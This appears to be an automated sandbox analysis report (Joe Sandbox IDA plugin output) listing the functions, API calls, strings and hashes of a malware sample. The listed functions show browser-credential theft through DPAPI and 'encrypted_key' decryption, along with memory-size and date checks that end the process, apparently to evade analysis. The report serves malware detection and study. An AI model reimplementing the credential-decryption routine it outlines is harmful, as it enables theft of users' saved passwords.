Instruction ID: fa4238ec13a9909d2a06eabaeedbec9afd3c4d5d27ba3f2f176ac5e057c61c04
Opcode Fuzzy Hash: ceff6c1b0c5b41120544c3d3be6942fd96f27d98ecc1bbdb5468e056c7fe4573
Instruction Fuzzy Hash: DB415E70E011089ADB04EFA1D866BEDBB79AF10314F40445EF10277196EF782AD9CF99

Function 00415190 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B

lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 004151CA
lstrcatA.KERNEL32(?,00421058), ref: 004151E7
lstrcatA.KERNEL32(?,02EB2450), ref: 004151FB
lstrcatA.KERNEL32(?,0042105C), ref: 0041520D

Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414B7C
Part of subcall function 00414B60: FindFirstFileA.KERNEL32(?,?), ref: 00414B93

Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC4), ref: 00414BC1
Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414BD7
Part of subcall function 00414B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00414DCD
Part of subcall function 00414B60: FindClose.KERNEL32(000000FF), ref: 00414DE2

Strings

cA, xrefs: 00415235, 0041526A, 0041528F, 00415238, 0041526D

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID: cA
API String ID: 2667927680-2872761854
Opcode ID: a663d27af1db11ea6e0538481b6c1ec1bf0866bdd2edd05cd7ef4aaec1a8ff54
Instruction ID: dc16e4b81abbfe3fe676fda19ddb0faac8fab1e973e0b9c2e11f24d889f851c9
Opcode Fuzzy Hash: a663d27af1db11ea6e0538481b6c1ec1bf0866bdd2edd05cd7ef4aaec1a8ff54
Instruction Fuzzy Hash: CD21C8B6E04218A7CB14FB70EC46EED333E9B94300F40455EB656561D1EE78ABC8CB95

Function 048C1487 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 048C14A5
__aulldiv.LIBCMT ref: 048C14BF
__aulldiv.LIBCMT ref: 048C14CD
ExitProcess.KERNEL32 ref: 048C14FB

Strings

@, xrefs: 048C149A

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: __aulldiv$ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 3404098578-2766056989
Opcode ID: 878a90f34e096d30e7d89448c69a574e23fa6b892c1598a4a852eafceae412f3
Instruction ID: 37f080353c42c231ac78abbd088352e946ad64100f1d966326553a278dd0afaa
Opcode Fuzzy Hash: 878a90f34e096d30e7d89448c69a574e23fa6b892c1598a4a852eafceae412f3
Instruction Fuzzy Hash: 930162B0D45308EAEF10DFD0CC89B9DBBB9AB00709F204A48E605F62C0D6B4A5408B56

Function 048CA7C7 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 155memoryCOMMON

Download Yara Rule

APIs

memcmp.MSVCRT(?,0042124C,00000003), ref: 048CA7E4

Part of subcall function 048DACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 048DACFF

memcmp.MSVCRT(?,004210FC,00000003), ref: 048CA839
memset.MSVCRT ref: 048CA872
LocalAlloc.KERNEL32(00000040,?), ref: 048CA8CB

Strings

@, xrefs: 048CA87B

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: memcmp$AllocLocallstrcpymemset
String ID: @
API String ID: 631489823-2766056989
Opcode ID: a0dfd0b00870158b78f1bd2e6a7999d260a6401e0527ae678fcebbd35b121d7e
Instruction ID: 04781534379cf8ab7e800ee957477f73c5efb1b6e0d94cd3c7a21b59dfd761d4
Opcode Fuzzy Hash: a0dfd0b00870158b78f1bd2e6a7999d260a6401e0527ae678fcebbd35b121d7e
Instruction Fuzzy Hash: FA512F3060124C9FDB18DFA8DD95FEC7771AF54308F10861CE90AAB591DBB4BA45CB51

Function 00410FC0 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00410FE8
strtok_s.MSVCRT ref: 0041112D

Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,02EB2270,?,004210F4,?,00000000), ref: 0041AB3B
Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: strtok_s$lstrcpylstrlen
String ID:
API String ID: 348468850-0
Opcode ID: 77d8088bb27251dd49dfcd07a26e8087964298c25f1e83629a7bc62193e0fc7a
Instruction ID: 03db8a1056b7d3decc043d16849240f9eafe82692520a9407f7f8401fd2e2a69
Opcode Fuzzy Hash: 77d8088bb27251dd49dfcd07a26e8087964298c25f1e83629a7bc62193e0fc7a
Instruction Fuzzy Hash: EF515E75A0410AEFCB08CF54D595AEEBBB5FF48308F10805EE9029B361D734EA91CB95

Function 0040A430 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 97COMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA

Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2

StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0040A489

Part of subcall function 0040A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A23F
Part of subcall function 0040A210: LocalAlloc.KERNEL32(00000040,?,?,?,00404F3E,00000000,?), ref: 0040A251
Part of subcall function 0040A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A27A
Part of subcall function 0040A210: LocalFree.KERNEL32(?,?,?,?,00404F3E,00000000,?), ref: 0040A28F

memcmp.MSVCRT(?,DPAPI,00000005), ref: 0040A4E2

Part of subcall function 0040A2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040A2D4
Part of subcall function 0040A2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A2F3
Part of subcall function 0040A2B0: memcpy.MSVCRT(?,?,?), ref: 0040A316
Part of subcall function 0040A2B0: LocalFree.KERNEL32(?), ref: 0040A323

Strings

, xrefs: 0040A511
DPAPI, xrefs: 0040A4D9
"encrypted_key":", xrefs: 0040A480

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 3731072634-738592651
Opcode ID: 670b58208e1ff2a3ebe60e827019e5f1f1af2f7c111c07866c18d1fd8af9f875
Instruction ID: 27b9d937d1eb2b37959d1b0821c640950517226354c316aa9f1795df4e4508dc
Opcode Fuzzy Hash: 670b58208e1ff2a3ebe60e827019e5f1f1af2f7c111c07866c18d1fd8af9f875
Instruction Fuzzy Hash: 323152B6D00209ABCF04DBD4DC45AEFB7B8BF58304F44456AE901B7281E7389A54CB6A

Function 048DD0D0 Relevance: 7.6, APIs: 5, Instructions: 94COMMON

Download Yara Rule

APIs

IsValidCodePage.KERNEL32 ref: 048DD108
GetCPInfo.KERNEL32(?,?), ref: 048DD11B
memset.MSVCRT ref: 048DD133
setSBUpLow.LIBCMT ref: 048DD209

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: CodeInfoPageValidmemset
String ID:
API String ID: 703783727-0
Opcode ID: df407eb42ed6ae19740f6001b4b28ec45f3a0947630176eabde2e48c15dd9d5f
Instruction ID: d159a9f1617b52a05531424056619da66d31cb93d8669ba163eb0369a6d9a3a7
Opcode Fuzzy Hash: df407eb42ed6ae19740f6001b4b28ec45f3a0947630176eabde2e48c15dd9d5f
Instruction Fuzzy Hash: 62313830A0A2559BFB259F78CC90379BFE0AF42315F048BBAD891CF191D268F405D751

Function 0493C049 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

dllmain_raw.LIBCMT ref: 0493C086
dllmain_crt_dispatch.LIBCMT ref: 0493C09D
dllmain_raw.LIBCMT ref: 0493C0E5
dllmain_crt_dispatch.LIBCMT ref: 0493C0F8
dllmain_raw.LIBCMT ref: 0493C10B

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
Instruction ID: e245770d7b3a2027f25ec2816ac857e703905d58d632ed3249ec05ff9365827c
Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
Instruction Fuzzy Hash: D1218073900A54AEEF319F55CC40D6F7A69EB87B96F014135F91576210D630AD41ABD0

Function 00416BC0 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(004210F4,?,?,00416DB1,00000000,?,02EB2270,?,004210F4,?,00000000,?), ref: 00416C0C
sscanf.NTDLL ref: 00416C39
SystemTimeToFileTime.KERNEL32(004210F4,00000000,?,?,?,?,?,?,?,?,?,?,?,02EB2270,?,004210F4), ref: 00416C52
SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,02EB2270,?,004210F4), ref: 00416C60
ExitProcess.KERNEL32 ref: 00416C7A

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Time$System$File$ExitProcesssscanf
String ID:
API String ID: 2533653975-0
Opcode ID: 8f3d302021b633d499eebc2b75f511318c1b224c781d312d182f2b4f083543dc
Instruction ID: 1a92bae8d2aea180e7b918fcc5e881d349bf880cfa552010dcbd9d747ca2879d
Opcode Fuzzy Hash: 8f3d302021b633d499eebc2b75f511318c1b224c781d312d182f2b4f083543dc
Instruction Fuzzy Hash: 0321CD75D142089BCF14DFE4E9459EEB7BABF48300F04852EF506A3250EB349644CB69

Function 048D6E27 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?), ref: 048D6E73
sscanf.NTDLL ref: 048D6EA0
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 048D6EB9
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 048D6EC7
ExitProcess.KERNEL32 ref: 048D6EE1

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Time$System$File$ExitProcesssscanf
String ID:
API String ID: 2533653975-0
Opcode ID: 6f773626f3441833338ad6a64aabe7637b4b1e18bec63e878425460b9ebe86da
Instruction ID: a61f563d12b0f050af6e29e120ca1038ce743e2f80ff89618db09c6502e48515
Opcode Fuzzy Hash: 6f773626f3441833338ad6a64aabe7637b4b1e18bec63e878425460b9ebe86da
Instruction Fuzzy Hash: 1321BAB5D1521DABCF18EFE4E8459EEB7B6BF48300F04852AE416E3250EB74A604CB65

Function 048D81F7 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 048D822E
RtlAllocateHeap.NTDLL(00000000), ref: 048D8235
RegOpenKeyExA.ADVAPI32(80000002,006D6BD4,00000000,00020119,?), ref: 048D8255
RegQueryValueExA.ADVAPI32(?,006D6EEC,00000000,00000000,000000FF,000000FF), ref: 048D8276
RegCloseKey.ADVAPI32(?), ref: 048D8289

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 7a9c0ba5048ddb27ec33de3f8be0389340df971bddb9b3c1683f2c2c2fb7b9da
Instruction ID: 5118023a0a280f7f40176748ee82f18fb0fb79f984443b55a404c66ecfa05f95
Opcode Fuzzy Hash: 7a9c0ba5048ddb27ec33de3f8be0389340df971bddb9b3c1683f2c2c2fb7b9da
Instruction Fuzzy Hash: EB118CB1E4520AABDB00DFC5DC49FAFBBB9EB44B10F10421AF611E6280E77469008BA1

Function 048D7B17 Relevance: 7.5, APIs: 5, Instructions: 42registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 048D7B2B
RtlAllocateHeap.NTDLL(00000000), ref: 048D7B32
RegOpenKeyExA.ADVAPI32(80000002,006D6D98,00000000,00020119,048D7AB0), ref: 048D7B52
RegQueryValueExA.ADVAPI32(048D7AB0,00420AB4,00000000,00000000,?,000000FF), ref: 048D7B71
RegCloseKey.ADVAPI32(048D7AB0), ref: 048D7B7B

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 14ae58864b366c4003c6da9e1b5cfb2a16c067edbf69ef05e192f5cb5c601d9e
Instruction ID: 878415481174a836aa7e4873c0b2d5e88707a6a4cf2c7fccd209dc94bf422fdc
Opcode Fuzzy Hash: 14ae58864b366c4003c6da9e1b5cfb2a16c067edbf69ef05e192f5cb5c601d9e
Instruction Fuzzy Hash: C501FFB5E45309BBEB00DBE4DC49FAEB779EF44701F10459AF605A7280E7B0AA00CB91

Function 004193F0 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(02EB5690,00000000,00000000,?,00409F71,00000000,02EB5690,00000000), ref: 004193FC
lstrcpyn.KERNEL32(006D7580,02EB5690,02EB5690,?,00409F71,00000000,02EB5690), ref: 00419420
lstrlenA.KERNEL32(00000000,?,00409F71,00000000,02EB5690), ref: 00419437
wsprintfA.USER32 ref: 00419457

Strings

%s%s, xrefs: 00419445

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: lstrcpynlstrlenwsprintf
String ID: %s%s
API String ID: 1206339513-3252725368
Opcode ID: 84a337f0fca5bdf22d9977d595415c9580f1c6ff8586b832ae243cfd604c2dbf
Instruction ID: 36a1aade9beab669742e698a5986ef2a8e6d9b7fa0e45cca69d8a80143706e49
Opcode Fuzzy Hash: 84a337f0fca5bdf22d9977d595415c9580f1c6ff8586b832ae243cfd604c2dbf
Instruction Fuzzy Hash: 9B011E75A18108FFCB04DFA8DD54EAE7B79EF48304F108249F9098B340EB31AA40DB96

Function 048D9657 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(\nm,00000000,00000000,?,048CA1D8,00000000,006D6E5C,00000000), ref: 048D9663
lstrcpyn.KERNEL32(006D7580,\nm,\nm,?,048CA1D8,00000000,006D6E5C), ref: 048D9687
lstrlen.KERNEL32(00000000,?,048CA1D8,00000000,006D6E5C), ref: 048D969E
wsprintfA.USER32 ref: 048D96BE

Strings

\nm, xrefs: 048D965F, 048D967A, 048D967E, 048D9690, 048D96B4, 048D9672, 048D9662, 048D967D, 048D9681, 048D96BD

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: lstrcpynlstrlenwsprintf
String ID: \nm
API String ID: 1206339513-1385846026
Opcode ID: 84a337f0fca5bdf22d9977d595415c9580f1c6ff8586b832ae243cfd604c2dbf
Instruction ID: b999ea00e917bc48381ef622d8d8f211210b24dbc100b30d69006246760dd375
Opcode Fuzzy Hash: 84a337f0fca5bdf22d9977d595415c9580f1c6ff8586b832ae243cfd604c2dbf
Instruction Fuzzy Hash: 67011EB5A05108FFCB04DFA8DD44EAE7B79EF48304F108649F9098B340EA31AA40DB96

Function 004012A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
HeapAlloc.KERNEL32(00000000), ref: 004012BB
RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
RegCloseKey.ADVAPI32(?), ref: 004012FF

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: 105a35557efbe30c530503ad4a66e3d917ab5a2bcfe7a77369b2bd71da3f475d
Instruction ID: b0bfc99e0bb5f41d030d85d97ebb5ad9faa7414484ca5a523084a8432581bb26
Opcode Fuzzy Hash: 105a35557efbe30c530503ad4a66e3d917ab5a2bcfe7a77369b2bd71da3f475d
Instruction Fuzzy Hash: D1013179E45209BFDB00DFD0DC49FAE7779EB48701F00419AFA05A7280E770AA008B91

Function 048C1507 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 048C151B
RtlAllocateHeap.NTDLL(00000000), ref: 048C1522
RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 048C153E
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 048C155C
RegCloseKey.ADVAPI32(?), ref: 048C1566

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 105a35557efbe30c530503ad4a66e3d917ab5a2bcfe7a77369b2bd71da3f475d
Instruction ID: a8dd1b2ba3dea022cf1e0725606ac18a37075f715759edc4c6bc76401cf8629a
Opcode Fuzzy Hash: 105a35557efbe30c530503ad4a66e3d917ab5a2bcfe7a77369b2bd71da3f475d
Instruction Fuzzy Hash: 7A01E179E45209BFDB04DFD4DC89FAE7779EB48701F104599FA0597280E770AA008B91

Function 0041CA72 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0041CA7E

Part of subcall function 0041C2A0: __getptd_noexit.LIBCMT ref: 0041C2A3
Part of subcall function 0041C2A0: __amsg_exit.LIBCMT ref: 0041C2B0

__getptd.LIBCMT ref: 0041CA95
__amsg_exit.LIBCMT ref: 0041CAA3
__lock.LIBCMT ref: 0041CAB3
__updatetlocinfoEx_nolock.LIBCMT ref: 0041CAC7

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: e1c6badfeacfa20afd93dab5a2b3e5961ef45d04078cbebb43daf6c602d2eecf
Instruction ID: 3f7fe6514f949f75c5091ac4188df1b21daf88bb75e36ed85571065e92ff899f
Opcode Fuzzy Hash: e1c6badfeacfa20afd93dab5a2b3e5961ef45d04078cbebb43daf6c602d2eecf
Instruction Fuzzy Hash: 10F06231A842189BD622FBA95C867DE33A0AF00758F50014FE405562D2CB7C59C186DE

Function 048DCCD9 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 048DCCE5

Part of subcall function 048DC507: __getptd_noexit.LIBCMT ref: 048DC50A
Part of subcall function 048DC507: __amsg_exit.LIBCMT ref: 048DC517

__getptd.LIBCMT ref: 048DCCFC
__amsg_exit.LIBCMT ref: 048DCD0A
__lock.LIBCMT ref: 048DCD1A
__updatetlocinfoEx_nolock.LIBCMT ref: 048DCD2E

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: d86048f8668ea50bb5e5d78fc2f13e62222d90724e777ee8542e60d5572919de
Instruction ID: ef997d0dffa6d243fba03334ab369872be98ab278501eca07c307d511944609d
